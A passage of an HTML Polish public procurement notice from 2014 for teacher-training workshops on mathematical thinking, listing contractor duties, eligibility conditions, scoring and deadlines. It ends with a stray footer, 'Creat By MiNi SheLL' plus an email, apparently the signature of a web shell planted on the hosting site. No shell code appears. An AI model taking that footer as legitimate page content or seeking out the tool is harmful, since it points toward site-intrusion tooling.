rzeczy).
-Główne tematy-2 dzień szkoleniowy (3 h) - Jak wspierać rozwój umiejętności matematycznych, logicznego myślenia na każdym z etapów nauczania
-Zagadnienia szczegółowe-Rozwój myślenia matematycznego na różnych etapach rozwoju (od przedszkola do szkoły ponadgimnazjalnej); Sposoby rozwoju umiejętności matematycznych na każdym z etapów nauczania (m.in. metody aktywizujące, eksperymenty, itd.); Motywowanie ucznia do nauki matematyki na każdym z poziomów nauczania; Zabawy, eksperymenty, ćwiczenia, scenariusze zajęć rozwijające myślenie matematyczne u dzieci i młodzieży na wszystkich poziomach nauczania.
-Oczekiwania względem eksperta-Doświadczenie zawodowe w obszarze rozwoju myślenia matematycznego oraz umiejętności matematycznych, ewentualnie metodyk lub konsultant pracujący w przeszłości jako nauczyciel; Wiedza i umiejętności z zakresu tematu szkolenia poparte doświadczeniem w zakresie: rozwoju myślenia matematycznego i umiejętności matematycznych, metod, narzędzi  wspomagających rozwój myślenia matematycznego na każdym z poziomów nauczania (m.in. metody aktywne, zabawy, ćwiczenia, eksperymenty, wykorzystanie narzędzi TIK ), innowacyjnych metod motywowania uczniów do nauki matematyki na każdym z poziomów nauczania, podstawy programowej na każdym z poziomów nauczania matematyki; Wysokie kompetencje trenerskie w zakresie pracy z grupą nauczycieli: znajomość procesu grupowego, stosowanie metod aktywizujących w nauczaniu dorosłych; Przygotowanie praktycznych materiałów szkoleniowych (m.in. linków, zasobów internetowych, gdzie można znaleźć konkretne rzeczy).d) Wykonawca ponosi odpowiedzialność za merytoryczną realizację warsztatów.

e) Obowiązki Wykonawcy:
1) zapewnienie ekspertów w danych dziedzinach do przeprowadzenia warsztatów;
2) przesyłanie asystentowi kierownika projektu wersji elektronicznych materiałów szkoleniowych wykorzystywanych na potrzeby przeprowadzenia warsztatów w celu wydrukowania ich przez Zamawiającego, co najmniej 5 dni roboczych przed ustalonym terminem realizacji warsztatów;
3) ustalanie terminów warsztatów w porozumieniu z asystentem kierownika projektu;
4) zachowanie w tajemnicy wszelkich danych, do których będzie miał dostęp w związku z realizacją zamówienia;
5) w sytuacji gdy prowadzący zajęcia w imieniu Wykonawcy nie spełni oczekiwań merytorycznych uczestników warsztatów, Wykonawca na wniosek Zamawiającego zobowiązany jest do zastąpienia prowadzącego inną osobą spełniającą wymogi postawione w SIWZ;
6) wymiana któregokolwiek z ekspertów zaproponowanych w ofercie przetargowej lub rozszerzenie składu (potencjału osobowego Wykonawcy) jest dopuszczalne w szczególnych, uzasadnionych okolicznościach, po uprzednim zatwierdzeniu kandydatury przez Zamawiającego. Doświadczenie i kwalifikacje nowego eksperta muszą być nie niższe niż te, które posiadała osoba zastępowana, a w przypadku rozszerzenia składu, doświadczenie i kwalifikacje proponowanej osoby muszą spełniać wymagania określone w SIWZ, na podstawie której została przygotowana oferta przetargowa Wykonawcy;
7) na miejsce każdego niezatwierdzonego kandydata Wykonawca zaproponuje innego, w terminie wyznaczonym przez Zamawiającego. Doświadczenie i kwalifikacje nowego kandydata muszą spełniać wymagania określone w SIWZ, na podstawie której została przygotowana oferta przetargowa Wykonawcy;
8) Wykonawca zobowiązuje się do udokumentowania wykonanych usług realizacji form doskonalenia nauczycieli za pomocą uzgodnionej z Zamawiającym dokumentacji, w tym w szczególności związanej z rozliczeniem liczby zrealizowanych godzin dydaktycznych warsztatów i przekazania ich w terminie do 7 dnia następnego miesiąca za miesiąc poprzedni, z zastrzeżeniem, że jeżeli wymagania projektu określają inny - wcześniejszy termin przekazania odpowiednich dokumentów, dokumenty te zostaną przekazane Zamawiającemu najpóźniej na 4 dni przed upływem tego terminu;
9) w przypadku złożenia nieprawidłowej dokumentacji Wykonawca zobowiązany jest do jej poprawienia i ponownego przedłożenia Zamawiającemu w terminie 2 dni od momentu wezwania do jej poprawienia przez Zamawiającego;
10) Wykonawca zobowiązuje się do sporządzenia wszelkich zestawień wynikających z dokumentacji wykonania usługi na prośbę Zamawiającego w terminie 3 dni roboczych od dnia przedłożenia takiego żądania;
11) koszty przejazdów ekspertów prowadzących warsztaty pokrywa Wykonawca;
12) przesyłanie asystentowi kierownika projektu wersji elektronicznej certyfikatów ukończenia warsztatów dla wszystkich uczestników w celu wydrukowania ich przez Zamawiającego;
13) wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu;
14) Wykonawca zapewnia sprzęt multimedialny niezbędny do realizacji przedmiotu zamówienia;
15) Zamawiający zastrzega sobie prawo do obserwacji warsztatów przez koordynatorów sieci;
16) Zamawiający zastrzega w umowie z Wykonawcą prawo wglądu do dokumentów Wykonawcy związanych z realizowanym Projektem, w tym dokumentów finansowych.

f) Zamawiający zapewnia produkty na przerwy kawowe i materiały piśmiennicze dla uczestników warsztatów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>KRYTERIUM 2 - doświadczenie Wykonawcy:
Rozpatrywane będzie na podstawie oceny załącznika nr 3.
Wartość punktowa zostanie przyznana zgodnie z poniższą tabelą:
- Element podlegający ocenie - Doświadczenie Wykonawcy w realizacji form doskonalenia nauczycieli (szkolenia, warsztaty, wykłady, konsultacje grupowe) każda nie krótsza niż 4 godziny zegarowe, w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
-111 i więcej - Liczba punktów 100;
-91 - 110 - Liczba punktów 75;
-71 - 90 - Liczba punktów 50;
-50 - 70 - Liczba punktów 25;

Ocena ofert zostanie dokonana przy zastosowaniu wzoru: 

liczba punktów =  liczba przyznanych punktów x 30%

Oferta najkorzystniejsza (z największą liczbą realizacji form doskonalenia nauczycieli) otrzyma 30 pkt.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Warunek o którym mowa w art. 22 ust.1 pkt 2 ustawy, dotyczący posiadania wiedzy i doświadczenia. Wykonawca musi wykazać realizację minimum 50 form doskonalenia nauczycieli (szkolenia, warsztaty, wykłady, konsultacje grupowe), każda nie krótsza niż 4 godziny zegarowe.
Ocena spełnienia warunku zostanie dokonana na podstawie wykazu wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>kserokopia wpisu do rejestru placówek doskonalenia nauczycieli - spełnienie warunku określonego w art. 22 ust. 1 pkt 1 ustawy i w Rozdziale V ust. 2 pkt 1,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie - 30</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_olsztynski/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Plac Bema 5 10-516 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2014 godzina 10:00, miejsce: Starostow Powiatowe w Olsztynie Plac Bema 5 10-516 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III - Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com